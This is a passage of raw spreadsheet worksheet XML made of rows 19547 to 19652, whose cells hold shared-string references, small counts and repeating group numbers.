      </c>
      <c r="C19547">
        <v>0</v>
      </c>
      <c r="D19547">
        <v>1863</v>
      </c>
    </row>
    <row r="19548" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19548" t="s">
        <v>16231</v>
      </c>
      <c r="B19548" t="s">
        <v>16218</v>
      </c>
      <c r="C19548">
        <v>0</v>
      </c>
      <c r="D19548">
        <v>1863</v>
      </c>
    </row>
    <row r="19549" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19549" t="s">
        <v>16229</v>
      </c>
      <c r="B19549" t="s">
        <v>16219</v>
      </c>
      <c r="C19549">
        <v>0</v>
      </c>
      <c r="D19549">
        <v>1863</v>
      </c>
    </row>
    <row r="19550" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19550" t="s">
        <v>16230</v>
      </c>
      <c r="B19550" t="s">
        <v>16220</v>
      </c>
      <c r="C19550">
        <v>0</v>
      </c>
      <c r="D19550">
        <v>1863</v>
      </c>
    </row>
    <row r="19551" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19551" t="s">
        <v>16229</v>
      </c>
      <c r="B19551" t="s">
        <v>16221</v>
      </c>
      <c r="C19551">
        <v>0</v>
      </c>
      <c r="D19551">
        <v>1863</v>
      </c>
    </row>
    <row r="19552" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19552" t="s">
        <v>16230</v>
      </c>
      <c r="B19552" t="s">
        <v>16222</v>
      </c>
      <c r="C19552">
        <v>0</v>
      </c>
      <c r="D19552">
        <v>1863</v>
      </c>
    </row>
    <row r="19553" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19553" t="s">
        <v>16223</v>
      </c>
      <c r="B19553" t="s">
        <v>16223</v>
      </c>
      <c r="C19553">
        <v>6</v>
      </c>
      <c r="D19553">
        <v>1863</v>
      </c>
    </row>
    <row r="19554" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19554" t="s">
        <v>16224</v>
      </c>
      <c r="B19554" t="s">
        <v>16224</v>
      </c>
      <c r="C19554">
        <v>0</v>
      </c>
      <c r="D19554">
        <v>1863</v>
      </c>
    </row>
    <row r="19555" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19555" t="s">
        <v>16228</v>
      </c>
      <c r="B19555" t="s">
        <v>16211</v>
      </c>
      <c r="C19555">
        <v>0</v>
      </c>
      <c r="D19555">
        <v>1845</v>
      </c>
    </row>
    <row r="19556" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19556" t="s">
        <v>16231</v>
      </c>
      <c r="B19556" t="s">
        <v>16212</v>
      </c>
      <c r="C19556">
        <v>0</v>
      </c>
      <c r="D19556">
        <v>1845</v>
      </c>
    </row>
    <row r="19557" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19557" t="s">
        <v>16228</v>
      </c>
      <c r="B19557" t="s">
        <v>16213</v>
      </c>
      <c r="C19557">
        <v>0</v>
      </c>
      <c r="D19557">
        <v>1845</v>
      </c>
    </row>
    <row r="19558" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19558" t="s">
        <v>16231</v>
      </c>
      <c r="B19558" t="s">
        <v>16214</v>
      </c>
      <c r="C19558">
        <v>0</v>
      </c>
      <c r="D19558">
        <v>1845</v>
      </c>
    </row>
    <row r="19559" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19559" t="s">
        <v>16228</v>
      </c>
      <c r="B19559" t="s">
        <v>16215</v>
      </c>
      <c r="C19559">
        <v>1</v>
      </c>
      <c r="D19559">
        <v>1845</v>
      </c>
    </row>
    <row r="19560" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19560" t="s">
        <v>16231</v>
      </c>
      <c r="B19560" t="s">
        <v>16216</v>
      </c>
      <c r="C19560">
        <v>4</v>
      </c>
      <c r="D19560">
        <v>1845</v>
      </c>
    </row>
    <row r="19561" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19561" t="s">
        <v>16228</v>
      </c>
      <c r="B19561" t="s">
        <v>16217</v>
      </c>
      <c r="C19561">
        <v>23</v>
      </c>
      <c r="D19561">
        <v>1845</v>
      </c>
    </row>
    <row r="19562" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19562" t="s">
        <v>16231</v>
      </c>
      <c r="B19562" t="s">
        <v>16218</v>
      </c>
      <c r="C19562">
        <v>5</v>
      </c>
      <c r="D19562">
        <v>1845</v>
      </c>
    </row>
    <row r="19563" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19563" t="s">
        <v>16229</v>
      </c>
      <c r="B19563" t="s">
        <v>16219</v>
      </c>
      <c r="C19563">
        <v>2</v>
      </c>
      <c r="D19563">
        <v>1845</v>
      </c>
    </row>
    <row r="19564" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19564" t="s">
        <v>16230</v>
      </c>
      <c r="B19564" t="s">
        <v>16220</v>
      </c>
      <c r="C19564">
        <v>8</v>
      </c>
      <c r="D19564">
        <v>1845</v>
      </c>
    </row>
    <row r="19565" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19565" t="s">
        <v>16229</v>
      </c>
      <c r="B19565" t="s">
        <v>16221</v>
      </c>
      <c r="C19565">
        <v>42</v>
      </c>
      <c r="D19565">
        <v>1845</v>
      </c>
    </row>
    <row r="19566" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19566" t="s">
        <v>16230</v>
      </c>
      <c r="B19566" t="s">
        <v>16222</v>
      </c>
      <c r="C19566">
        <v>30</v>
      </c>
      <c r="D19566">
        <v>1845</v>
      </c>
    </row>
    <row r="19567" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19567" t="s">
        <v>16223</v>
      </c>
      <c r="B19567" t="s">
        <v>16223</v>
      </c>
      <c r="C19567">
        <v>26</v>
      </c>
      <c r="D19567">
        <v>1845</v>
      </c>
    </row>
    <row r="19568" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19568" t="s">
        <v>16224</v>
      </c>
      <c r="B19568" t="s">
        <v>16224</v>
      </c>
      <c r="C19568">
        <v>1</v>
      </c>
      <c r="D19568">
        <v>1845</v>
      </c>
    </row>
    <row r="19569" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19569" t="s">
        <v>16228</v>
      </c>
      <c r="B19569" t="s">
        <v>16211</v>
      </c>
      <c r="C19569">
        <v>0</v>
      </c>
      <c r="D19569">
        <v>1470</v>
      </c>
    </row>
    <row r="19570" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19570" t="s">
        <v>16231</v>
      </c>
      <c r="B19570" t="s">
        <v>16212</v>
      </c>
      <c r="C19570">
        <v>0</v>
      </c>
      <c r="D19570">
        <v>1470</v>
      </c>
    </row>
    <row r="19571" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19571" t="s">
        <v>16228</v>
      </c>
      <c r="B19571" t="s">
        <v>16213</v>
      </c>
      <c r="C19571">
        <v>0</v>
      </c>
      <c r="D19571">
        <v>1470</v>
      </c>
    </row>
    <row r="19572" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19572" t="s">
        <v>16231</v>
      </c>
      <c r="B19572" t="s">
        <v>16214</v>
      </c>
      <c r="C19572">
        <v>0</v>
      </c>
      <c r="D19572">
        <v>1470</v>
      </c>
    </row>
    <row r="19573" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19573" t="s">
        <v>16228</v>
      </c>
      <c r="B19573" t="s">
        <v>16215</v>
      </c>
      <c r="C19573">
        <v>0</v>
      </c>
      <c r="D19573">
        <v>1470</v>
      </c>
    </row>
    <row r="19574" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19574" t="s">
        <v>16231</v>
      </c>
      <c r="B19574" t="s">
        <v>16216</v>
      </c>
      <c r="C19574">
        <v>3</v>
      </c>
      <c r="D19574">
        <v>1470</v>
      </c>
    </row>
    <row r="19575" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19575" t="s">
        <v>16228</v>
      </c>
      <c r="B19575" t="s">
        <v>16217</v>
      </c>
      <c r="C19575">
        <v>2</v>
      </c>
      <c r="D19575">
        <v>1470</v>
      </c>
    </row>
    <row r="19576" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19576" t="s">
        <v>16231</v>
      </c>
      <c r="B19576" t="s">
        <v>16218</v>
      </c>
      <c r="C19576">
        <v>4</v>
      </c>
      <c r="D19576">
        <v>1470</v>
      </c>
    </row>
    <row r="19577" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19577" t="s">
        <v>16229</v>
      </c>
      <c r="B19577" t="s">
        <v>16219</v>
      </c>
      <c r="C19577">
        <v>0</v>
      </c>
      <c r="D19577">
        <v>1470</v>
      </c>
    </row>
    <row r="19578" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19578" t="s">
        <v>16230</v>
      </c>
      <c r="B19578" t="s">
        <v>16220</v>
      </c>
      <c r="C19578">
        <v>0</v>
      </c>
      <c r="D19578">
        <v>1470</v>
      </c>
    </row>
    <row r="19579" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19579" t="s">
        <v>16229</v>
      </c>
      <c r="B19579" t="s">
        <v>16221</v>
      </c>
      <c r="C19579">
        <v>2</v>
      </c>
      <c r="D19579">
        <v>1470</v>
      </c>
    </row>
    <row r="19580" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19580" t="s">
        <v>16230</v>
      </c>
      <c r="B19580" t="s">
        <v>16222</v>
      </c>
      <c r="C19580">
        <v>4</v>
      </c>
      <c r="D19580">
        <v>1470</v>
      </c>
    </row>
    <row r="19581" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19581" t="s">
        <v>16223</v>
      </c>
      <c r="B19581" t="s">
        <v>16223</v>
      </c>
      <c r="C19581">
        <v>0</v>
      </c>
      <c r="D19581">
        <v>1470</v>
      </c>
    </row>
    <row r="19582" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19582" t="s">
        <v>16224</v>
      </c>
      <c r="B19582" t="s">
        <v>16224</v>
      </c>
      <c r="C19582">
        <v>0</v>
      </c>
      <c r="D19582">
        <v>1470</v>
      </c>
    </row>
    <row r="19583" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19583" t="s">
        <v>16228</v>
      </c>
      <c r="B19583" t="s">
        <v>16211</v>
      </c>
      <c r="C19583">
        <v>0</v>
      </c>
      <c r="D19583">
        <v>5629</v>
      </c>
    </row>
    <row r="19584" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19584" t="s">
        <v>16231</v>
      </c>
      <c r="B19584" t="s">
        <v>16212</v>
      </c>
      <c r="C19584">
        <v>0</v>
      </c>
      <c r="D19584">
        <v>5629</v>
      </c>
    </row>
    <row r="19585" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19585" t="s">
        <v>16228</v>
      </c>
      <c r="B19585" t="s">
        <v>16213</v>
      </c>
      <c r="C19585">
        <v>0</v>
      </c>
      <c r="D19585">
        <v>5629</v>
      </c>
    </row>
    <row r="19586" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19586" t="s">
        <v>16231</v>
      </c>
      <c r="B19586" t="s">
        <v>16214</v>
      </c>
      <c r="C19586">
        <v>0</v>
      </c>
      <c r="D19586">
        <v>5629</v>
      </c>
    </row>
    <row r="19587" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19587" t="s">
        <v>16228</v>
      </c>
      <c r="B19587" t="s">
        <v>16215</v>
      </c>
      <c r="C19587">
        <v>2</v>
      </c>
      <c r="D19587">
        <v>5629</v>
      </c>
    </row>
    <row r="19588" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19588" t="s">
        <v>16231</v>
      </c>
      <c r="B19588" t="s">
        <v>16216</v>
      </c>
      <c r="C19588">
        <v>2</v>
      </c>
      <c r="D19588">
        <v>5629</v>
      </c>
    </row>
    <row r="19589" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19589" t="s">
        <v>16228</v>
      </c>
      <c r="B19589" t="s">
        <v>16217</v>
      </c>
      <c r="C19589">
        <v>0</v>
      </c>
      <c r="D19589">
        <v>5629</v>
      </c>
    </row>
    <row r="19590" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19590" t="s">
        <v>16231</v>
      </c>
      <c r="B19590" t="s">
        <v>16218</v>
      </c>
      <c r="C19590">
        <v>2</v>
      </c>
      <c r="D19590">
        <v>5629</v>
      </c>
    </row>
    <row r="19591" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19591" t="s">
        <v>16229</v>
      </c>
      <c r="B19591" t="s">
        <v>16219</v>
      </c>
      <c r="C19591">
        <v>0</v>
      </c>
      <c r="D19591">
        <v>5629</v>
      </c>
    </row>
    <row r="19592" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19592" t="s">
        <v>16230</v>
      </c>
      <c r="B19592" t="s">
        <v>16220</v>
      </c>
      <c r="C19592">
        <v>2</v>
      </c>
      <c r="D19592">
        <v>5629</v>
      </c>
    </row>
    <row r="19593" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19593" t="s">
        <v>16229</v>
      </c>
      <c r="B19593" t="s">
        <v>16221</v>
      </c>
      <c r="C19593">
        <v>0</v>
      </c>
      <c r="D19593">
        <v>5629</v>
      </c>
    </row>
    <row r="19594" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19594" t="s">
        <v>16230</v>
      </c>
      <c r="B19594" t="s">
        <v>16222</v>
      </c>
      <c r="C19594">
        <v>9</v>
      </c>
      <c r="D19594">
        <v>5629</v>
      </c>
    </row>
    <row r="19595" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19595" t="s">
        <v>16223</v>
      </c>
      <c r="B19595" t="s">
        <v>16223</v>
      </c>
      <c r="C19595">
        <v>15</v>
      </c>
      <c r="D19595">
        <v>5629</v>
      </c>
    </row>
    <row r="19596" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19596" t="s">
        <v>16224</v>
      </c>
      <c r="B19596" t="s">
        <v>16224</v>
      </c>
      <c r="C19596">
        <v>0</v>
      </c>
      <c r="D19596">
        <v>5629</v>
      </c>
    </row>
    <row r="19597" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19597" t="s">
        <v>16228</v>
      </c>
      <c r="B19597" t="s">
        <v>16211</v>
      </c>
      <c r="C19597">
        <v>0</v>
      </c>
      <c r="D19597">
        <v>5622</v>
      </c>
    </row>
    <row r="19598" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19598" t="s">
        <v>16231</v>
      </c>
      <c r="B19598" t="s">
        <v>16212</v>
      </c>
      <c r="C19598">
        <v>0</v>
      </c>
      <c r="D19598">
        <v>5622</v>
      </c>
    </row>
    <row r="19599" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19599" t="s">
        <v>16228</v>
      </c>
      <c r="B19599" t="s">
        <v>16213</v>
      </c>
      <c r="C19599">
        <v>0</v>
      </c>
      <c r="D19599">
        <v>5622</v>
      </c>
    </row>
    <row r="19600" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19600" t="s">
        <v>16231</v>
      </c>
      <c r="B19600" t="s">
        <v>16214</v>
      </c>
      <c r="C19600">
        <v>0</v>
      </c>
      <c r="D19600">
        <v>5622</v>
      </c>
    </row>
    <row r="19601" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19601" t="s">
        <v>16228</v>
      </c>
      <c r="B19601" t="s">
        <v>16215</v>
      </c>
      <c r="C19601">
        <v>1</v>
      </c>
      <c r="D19601">
        <v>5622</v>
      </c>
    </row>
    <row r="19602" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19602" t="s">
        <v>16231</v>
      </c>
      <c r="B19602" t="s">
        <v>16216</v>
      </c>
      <c r="C19602">
        <v>0</v>
      </c>
      <c r="D19602">
        <v>5622</v>
      </c>
    </row>
    <row r="19603" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19603" t="s">
        <v>16228</v>
      </c>
      <c r="B19603" t="s">
        <v>16217</v>
      </c>
      <c r="C19603">
        <v>0</v>
      </c>
      <c r="D19603">
        <v>5622</v>
      </c>
    </row>
    <row r="19604" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19604" t="s">
        <v>16231</v>
      </c>
      <c r="B19604" t="s">
        <v>16218</v>
      </c>
      <c r="C19604">
        <v>0</v>
      </c>
      <c r="D19604">
        <v>5622</v>
      </c>
    </row>
    <row r="19605" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19605" t="s">
        <v>16229</v>
      </c>
      <c r="B19605" t="s">
        <v>16219</v>
      </c>
      <c r="C19605">
        <v>0</v>
      </c>
      <c r="D19605">
        <v>5622</v>
      </c>
    </row>
    <row r="19606" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19606" t="s">
        <v>16230</v>
      </c>
      <c r="B19606" t="s">
        <v>16220</v>
      </c>
      <c r="C19606">
        <v>1</v>
      </c>
      <c r="D19606">
        <v>5622</v>
      </c>
    </row>
    <row r="19607" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19607" t="s">
        <v>16229</v>
      </c>
      <c r="B19607" t="s">
        <v>16221</v>
      </c>
      <c r="C19607">
        <v>0</v>
      </c>
      <c r="D19607">
        <v>5622</v>
      </c>
    </row>
    <row r="19608" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19608" t="s">
        <v>16230</v>
      </c>
      <c r="B19608" t="s">
        <v>16222</v>
      </c>
      <c r="C19608">
        <v>0</v>
      </c>
      <c r="D19608">
        <v>5622</v>
      </c>
    </row>
    <row r="19609" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19609" t="s">
        <v>16223</v>
      </c>
      <c r="B19609" t="s">
        <v>16223</v>
      </c>
      <c r="C19609">
        <v>2</v>
      </c>
      <c r="D19609">
        <v>5622</v>
      </c>
    </row>
    <row r="19610" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19610" t="s">
        <v>16224</v>
      </c>
      <c r="B19610" t="s">
        <v>16224</v>
      </c>
      <c r="C19610">
        <v>0</v>
      </c>
      <c r="D19610">
        <v>5622</v>
      </c>
    </row>
    <row r="19611" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19611" t="s">
        <v>16228</v>
      </c>
      <c r="B19611" t="s">
        <v>16211</v>
      </c>
      <c r="C19611">
        <v>0</v>
      </c>
      <c r="D19611">
        <v>1679</v>
      </c>
    </row>
    <row r="19612" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19612" t="s">
        <v>16231</v>
      </c>
      <c r="B19612" t="s">
        <v>16212</v>
      </c>
      <c r="C19612">
        <v>0</v>
      </c>
      <c r="D19612">
        <v>1679</v>
      </c>
    </row>
    <row r="19613" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19613" t="s">
        <v>16228</v>
      </c>
      <c r="B19613" t="s">
        <v>16213</v>
      </c>
      <c r="C19613">
        <v>0</v>
      </c>
      <c r="D19613">
        <v>1679</v>
      </c>
    </row>
    <row r="19614" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19614" t="s">
        <v>16231</v>
      </c>
      <c r="B19614" t="s">
        <v>16214</v>
      </c>
      <c r="C19614">
        <v>0</v>
      </c>
      <c r="D19614">
        <v>1679</v>
      </c>
    </row>
    <row r="19615" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19615" t="s">
        <v>16228</v>
      </c>
      <c r="B19615" t="s">
        <v>16215</v>
      </c>
      <c r="C19615">
        <v>0</v>
      </c>
      <c r="D19615">
        <v>1679</v>
      </c>
    </row>
    <row r="19616" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19616" t="s">
        <v>16231</v>
      </c>
      <c r="B19616" t="s">
        <v>16216</v>
      </c>
      <c r="C19616">
        <v>0</v>
      </c>
      <c r="D19616">
        <v>1679</v>
      </c>
    </row>
    <row r="19617" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19617" t="s">
        <v>16228</v>
      </c>
      <c r="B19617" t="s">
        <v>16217</v>
      </c>
      <c r="C19617">
        <v>0</v>
      </c>
      <c r="D19617">
        <v>1679</v>
      </c>
    </row>
    <row r="19618" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19618" t="s">
        <v>16231</v>
      </c>
      <c r="B19618" t="s">
        <v>16218</v>
      </c>
      <c r="C19618">
        <v>0</v>
      </c>
      <c r="D19618">
        <v>1679</v>
      </c>
    </row>
    <row r="19619" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19619" t="s">
        <v>16229</v>
      </c>
      <c r="B19619" t="s">
        <v>16219</v>
      </c>
      <c r="C19619">
        <v>0</v>
      </c>
      <c r="D19619">
        <v>1679</v>
      </c>
    </row>
    <row r="19620" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19620" t="s">
        <v>16230</v>
      </c>
      <c r="B19620" t="s">
        <v>16220</v>
      </c>
      <c r="C19620">
        <v>0</v>
      </c>
      <c r="D19620">
        <v>1679</v>
      </c>
    </row>
    <row r="19621" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19621" t="s">
        <v>16229</v>
      </c>
      <c r="B19621" t="s">
        <v>16221</v>
      </c>
      <c r="C19621">
        <v>0</v>
      </c>
      <c r="D19621">
        <v>1679</v>
      </c>
    </row>
    <row r="19622" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19622" t="s">
        <v>16230</v>
      </c>
      <c r="B19622" t="s">
        <v>16222</v>
      </c>
      <c r="C19622">
        <v>0</v>
      </c>
      <c r="D19622">
        <v>1679</v>
      </c>
    </row>
    <row r="19623" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19623" t="s">
        <v>16223</v>
      </c>
      <c r="B19623" t="s">
        <v>16223</v>
      </c>
      <c r="C19623">
        <v>0</v>
      </c>
      <c r="D19623">
        <v>1679</v>
      </c>
    </row>
    <row r="19624" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19624" t="s">
        <v>16224</v>
      </c>
      <c r="B19624" t="s">
        <v>16224</v>
      </c>
      <c r="C19624">
        <v>0</v>
      </c>
      <c r="D19624">
        <v>1679</v>
      </c>
    </row>
    <row r="19625" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19625" t="s">
        <v>16228</v>
      </c>
      <c r="B19625" t="s">
        <v>16215</v>
      </c>
      <c r="C19625">
        <v>1</v>
      </c>
      <c r="D19625">
        <v>1679</v>
      </c>
    </row>
    <row r="19626" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19626" t="s">
        <v>16231</v>
      </c>
      <c r="B19626" t="s">
        <v>16216</v>
      </c>
      <c r="C19626">
        <v>1</v>
      </c>
      <c r="D19626">
        <v>1679</v>
      </c>
    </row>
    <row r="19627" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19627" t="s">
        <v>16228</v>
      </c>
      <c r="B19627" t="s">
        <v>16217</v>
      </c>
      <c r="C19627">
        <v>5</v>
      </c>
      <c r="D19627">
        <v>1679</v>
      </c>
    </row>
    <row r="19628" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19628" t="s">
        <v>16230</v>
      </c>
      <c r="B19628" t="s">
        <v>16220</v>
      </c>
      <c r="C19628">
        <v>2</v>
      </c>
      <c r="D19628">
        <v>1679</v>
      </c>
    </row>
    <row r="19629" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19629" t="s">
        <v>16229</v>
      </c>
      <c r="B19629" t="s">
        <v>16221</v>
      </c>
      <c r="C19629">
        <v>6</v>
      </c>
      <c r="D19629">
        <v>1679</v>
      </c>
    </row>
    <row r="19630" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19630" t="s">
        <v>16223</v>
      </c>
      <c r="B19630" t="s">
        <v>16223</v>
      </c>
      <c r="C19630">
        <v>5</v>
      </c>
      <c r="D19630">
        <v>1679</v>
      </c>
    </row>
    <row r="19631" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19631" t="s">
        <v>16224</v>
      </c>
      <c r="B19631" t="s">
        <v>16224</v>
      </c>
      <c r="C19631">
        <v>3</v>
      </c>
      <c r="D19631">
        <v>1679</v>
      </c>
    </row>
    <row r="19632" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19632" t="s">
        <v>16228</v>
      </c>
      <c r="B19632" t="s">
        <v>16211</v>
      </c>
      <c r="C19632">
        <v>0</v>
      </c>
      <c r="D19632">
        <v>2231</v>
      </c>
    </row>
    <row r="19633" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19633" t="s">
        <v>16231</v>
      </c>
      <c r="B19633" t="s">
        <v>16212</v>
      </c>
      <c r="C19633">
        <v>0</v>
      </c>
      <c r="D19633">
        <v>2231</v>
      </c>
    </row>
    <row r="19634" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19634" t="s">
        <v>16228</v>
      </c>
      <c r="B19634" t="s">
        <v>16213</v>
      </c>
      <c r="C19634">
        <v>0</v>
      </c>
      <c r="D19634">
        <v>2231</v>
      </c>
    </row>
    <row r="19635" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19635" t="s">
        <v>16231</v>
      </c>
      <c r="B19635" t="s">
        <v>16214</v>
      </c>
      <c r="C19635">
        <v>0</v>
      </c>
      <c r="D19635">
        <v>2231</v>
      </c>
    </row>
    <row r="19636" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19636" t="s">
        <v>16228</v>
      </c>
      <c r="B19636" t="s">
        <v>16215</v>
      </c>
      <c r="C19636">
        <v>1</v>
      </c>
      <c r="D19636">
        <v>2231</v>
      </c>
    </row>
    <row r="19637" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19637" t="s">
        <v>16231</v>
      </c>
      <c r="B19637" t="s">
        <v>16216</v>
      </c>
      <c r="C19637">
        <v>1</v>
      </c>
      <c r="D19637">
        <v>2231</v>
      </c>
    </row>
    <row r="19638" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19638" t="s">
        <v>16228</v>
      </c>
      <c r="B19638" t="s">
        <v>16217</v>
      </c>
      <c r="C19638">
        <v>3</v>
      </c>
      <c r="D19638">
        <v>2231</v>
      </c>
    </row>
    <row r="19639" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19639" t="s">
        <v>16231</v>
      </c>
      <c r="B19639" t="s">
        <v>16218</v>
      </c>
      <c r="C19639">
        <v>0</v>
      </c>
      <c r="D19639">
        <v>2231</v>
      </c>
    </row>
    <row r="19640" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19640" t="s">
        <v>16229</v>
      </c>
      <c r="B19640" t="s">
        <v>16219</v>
      </c>
      <c r="C19640">
        <v>0</v>
      </c>
      <c r="D19640">
        <v>2231</v>
      </c>
    </row>
    <row r="19641" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19641" t="s">
        <v>16230</v>
      </c>
      <c r="B19641" t="s">
        <v>16220</v>
      </c>
      <c r="C19641">
        <v>0</v>
      </c>
      <c r="D19641">
        <v>2231</v>
      </c>
    </row>
    <row r="19642" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19642" t="s">
        <v>16229</v>
      </c>
      <c r="B19642" t="s">
        <v>16221</v>
      </c>
      <c r="C19642">
        <v>4</v>
      </c>
      <c r="D19642">
        <v>2231</v>
      </c>
    </row>
    <row r="19643" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19643" t="s">
        <v>16230</v>
      </c>
      <c r="B19643" t="s">
        <v>16222</v>
      </c>
      <c r="C19643">
        <v>0</v>
      </c>
      <c r="D19643">
        <v>2231</v>
      </c>
    </row>
    <row r="19644" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19644" t="s">
        <v>16223</v>
      </c>
      <c r="B19644" t="s">
        <v>16223</v>
      </c>
      <c r="C19644">
        <v>20</v>
      </c>
      <c r="D19644">
        <v>2231</v>
      </c>
    </row>
    <row r="19645" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19645" t="s">
        <v>16224</v>
      </c>
      <c r="B19645" t="s">
        <v>16224</v>
      </c>
      <c r="C19645">
        <v>1</v>
      </c>
      <c r="D19645">
        <v>2231</v>
      </c>
    </row>
    <row r="19646" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19646" t="s">
        <v>16228</v>
      </c>
      <c r="B19646" t="s">
        <v>16211</v>
      </c>
      <c r="C19646">
        <v>0</v>
      </c>
      <c r="D19646">
        <v>5522</v>
      </c>
    </row>
    <row r="19647" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19647" t="s">
        <v>16231</v>
      </c>
      <c r="B19647" t="s">
        <v>16212</v>
      </c>
      <c r="C19647">
        <v>0</v>
      </c>
      <c r="D19647">
        <v>5522</v>
      </c>
    </row>
    <row r="19648" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19648" t="s">
        <v>16228</v>
      </c>
      <c r="B19648" t="s">
        <v>16213</v>
      </c>
      <c r="C19648">
        <v>0</v>
      </c>
      <c r="D19648">
        <v>5522</v>
      </c>
    </row>
    <row r="19649" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19649" t="s">
        <v>16231</v>
      </c>
      <c r="B19649" t="s">
        <v>16214</v>
      </c>
      <c r="C19649">
        <v>0</v>
      </c>
      <c r="D19649">
        <v>5522</v>
      </c>
    </row>
    <row r="19650" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19650" t="s">
        <v>16228</v>
      </c>
      <c r="B19650" t="s">
        <v>16215</v>
      </c>
      <c r="C19650">
        <v>0</v>
      </c>
      <c r="D19650">
        <v>5522</v>
      </c>
    </row>
    <row r="19651" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19651" t="s">
        <v>16231</v>
      </c>
      <c r="B19651" t="s">
        <v>16216</v>
      </c>
      <c r="C19651">
        <v>3</v>
      </c>
      <c r="D19651">
        <v>5522</v>
      </c>
    </row>
    <row r="19652" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19652" t="s">
        <v>16228</v>
      </c>
